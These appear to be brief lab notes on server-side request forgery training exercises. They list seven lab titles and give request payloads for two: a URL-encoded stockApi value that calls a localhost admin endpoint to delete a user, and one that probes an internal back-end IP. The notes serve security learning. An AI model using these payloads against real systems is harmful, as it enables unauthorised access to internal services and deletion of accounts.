labs
Lab - 1: Basic SSRF against the local server (A)
POST /product/stock HTTP/1.1
...
stockApi=http%3a%2f%2flocalhost%2fadmin%2fdelete%3fusername%3dcarlosLab - 2: Basic SSRF against another back-end system (A)
POST /product/stock HTTP/1.1
...
stockApi=http://192.168.0.1:8080/product/stock/check?productId=1&storeId=1Lab - 3: SSRF with blacklist-based input filter (P)
Lab - 4: SSRF with whitelist-based input filter (E)
Lab - 5: SSRF with filter bypass via open redirection vulnerability (P)
Lab - 6: Blind SSRF with out-of-band detection (P)
Lab - 7: Blind SSRF with Shellshock exploitation (E)
Last updated